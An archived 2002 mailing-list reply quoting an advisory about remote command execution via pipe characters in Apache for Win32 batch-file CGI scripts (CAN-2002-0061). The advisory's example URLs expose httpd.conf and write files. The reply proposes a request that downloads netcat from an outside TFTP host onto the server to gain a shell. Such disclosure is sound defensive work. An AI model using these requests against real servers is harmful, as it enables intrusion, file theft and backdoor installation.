This was a nice one, if this can do what i think you could do something like: you could retrieve your netcat with a request like this one, or perhaps replacing the "+" for "%20" if it doesn't work. http://host/cgi-bin/test-cgi.bat?|tftp+-i+tftp.mynetcat.com+GET+/nc.exe+c:\tmp with netcat on the box i can think of a 1000 ways how to get a cmd :-) PD: This is just an idea, i haven't try it yet -Replugge- On Thu, 2002-03-21 at 18:06, Ory Segal wrote: > Vulnerability in Apache for Win32 batch file processing - Remote command > execution > > => Author: Ory Segal, Sanctum inc. http://www.sanctuminc.com > > => Release date: March, 21st 2002 (Vendor was notified at: Feb. 13th 2002) > > => Vendor: Apache group > > => Product: Apache web server (Win32) - Running DOS batch files > Tested on: > - Apache 1.3.23 > - Apache 2.0.28-BETA (By default includes /cgi-bin/test-cgi.bat > file which > enables this attack) > > => Severity: High, remote command execution and arbitrary file viewing. > > => CVE candidate: CAN-2002-0061 > (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-0061) > > => Summary: Because of a the way Apache web server handles DOS batch scripts > it is possible to execute remote commands on the web server by using the > pipe ('|') character. > > ** IMPORTANT ** > The Apache 2.0.x installation is shipped with the default script > /cgi-bin/test-cgi.bat > which can be exploited, but it should be noted that ANY '.bat' or '.cmd' > script > will allow exploitation of this vulnerability. > > > => Description: When a request for a DOS batch file (.bat or .cmd) is sent > to an Apache > web server, the server will spawn a shell interpreter (cmd.exe by default) > and > will run the script with the parameters sent to it by the user. Because no > proper validation is done on the input, it is possible to send a pipe > character > ('|') with commands appended to it as parameters to the CGI script, and the > shell > interpreter will execute them. > > Example: > > 1) > http://TARGET/cgi-bin/test-cgi.bat?|copy+..\conf\httpd.conf+..\htdocs\httpd. > conf > > This request will copy the httpd.conf file residing in the /conf directory > of the Apache > installation, into the virtual web root where it can be viewed by any user. > > 2) http://TARGET/cgi-bin/test-cgi.bat?|echo+Foobar+>>+..\htdocs\index.html > > This will append the string "Foobar" to the index.html file residing in the > virtual > web root directory. > > 3) http://TARGET/cgi-bin/test-cgi.bat?|dir+c:+>..\htdocs\dir.txt > > This will create a file containing the directory listing of the C: drive, > and will put the file in the virtual web root, where any user can read it. > > ** Notes: > > 1) Url-Decoding is not provided by Apache except for the '+' character which > is substituted by a space character. > > 2) Spilling the output into the STDOUT would most likely cause Apache to > write an > error message since it expects the STDOUT of a CGI script to have an HTTP > response format > (potential HTTP headers followed by a mandatory blank line followed by a > response body). > Therefore in order to view the result of a command, it is recommended that > you redirect > the output to a file under the web server's virtual root. > > > => Solution: Upgrade your Apache web server to: 1.3.24 (which should be > available later > today), or 2.0.34-beta (which will be published soon). Downloads are located > at: > http://www.apache.org/dist/httpd/ > > <<apache_advisory.txt>> > > Ory Segal > Sanctum, Inc. > http://www.SanctumInc.com/ > > > ---- > > /////////////////////////////////////////////////////////////////////////////// > //==========================>> Security Advisory <<==========================// > /////////////////////////////////////////////////////////////////////////////// > > -------------------------------------------------------------------- > Vulnerability in Apache for Win32 batch file processing - > Remote command execution > -------------------------------------------------------------------- > > => Author: Ory Segal, Sanctum inc. http://www.sanctuminc.com > > => Release date: March, 21st 2002 (Vendor was notified at: Feb. 13th 2002) > > => Vendor: Apache group > > => Product: Apache web server (Win32) - Running DOS batch files > Tested on: > - Apache 1.3.23 > - Apache 2.0.28-BETA (By default includes /cgi-bin/test-cgi.bat file which > enables this attack) > > => Severity: High, remote command execution and arbitrary file viewing. > > => CVE candidate: CAN-2002-0061 > (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-0061) > > => Summary: Because of a the way Apache web server handles DOS batch scripts > it is possible to execute remote commands on the web server by using the > pipe ('|') character. > > ** IMPORTANT ** > The Apache 2.0.x installation is shipped with the default script /cgi-bin/test-cgi.bat > which can be exploited, but it should be noted that ANY '.bat' or '.cmd' script > will allow exploitation of this vulnerability. > > > => Description: When a request for a DOS batch file (.bat or .cmd) is sent to an Apache > web server, the server will spawn a shell interpreter (cmd.exe by default) and > will run the script with the parameters sent to it by the user. Because no > proper validation is done on the input, it is possible to send a pipe character > ('|') with commands appended to it as parameters to the CGI script, and the shell > interpreter will execute them. > > Example: > > 1) http://TARGET/cgi-bin/test-cgi.bat?|copy+..\conf\httpd.conf+..\htdocs\httpd.conf > > This request will copy the httpd.conf file residing in the /conf directory of the Apache > installation, into the virtual web root where it can be viewed by any user. > > 2) http://TARGET/cgi-bin/test-cgi.bat?|echo+Foobar+>>+..\htdocs\index.html > > This will append the string "Foobar" to the index.html file residing in the virtual > web root directory. > > 3) http://TARGET/cgi-bin/test-cgi.bat?|dir+c:+>..\htdocs\dir.txt > > This will create a file containing the directory listing of the C: drive, > and will put the file in the virtual web root, where any user can read it. > > ** Notes: > > 1) Url-Decoding is not provided by Apache except for the '+' character which > is substituted by a space character. > > 2) Spilling the output into the STDOUT would most likely cause Apache to write an > error message since it expects the STDOUT of a CGI script to have an HTTP response format > (potential HTTP headers followed by a mandatory blank line followed by a response body). > Therefore in order to view the result of a command, it is recommended that you redirect > the output to a file under the web server's virtual root. > > > => Solution: Upgrade your Apache web server to: 1.3.24 (which should be available later > today), or 2.0.34-beta (which will be published soon). Downloads are located at: > http://www.apache.org/dist/httpd/ -- /* Rodrigo Gutierrez <rodrigoat_private> Trustix AS http://www.trustix.com */
This archive was generated by hypermail 2b30 : Thu Mar 21 2002 - 14:41:51 PST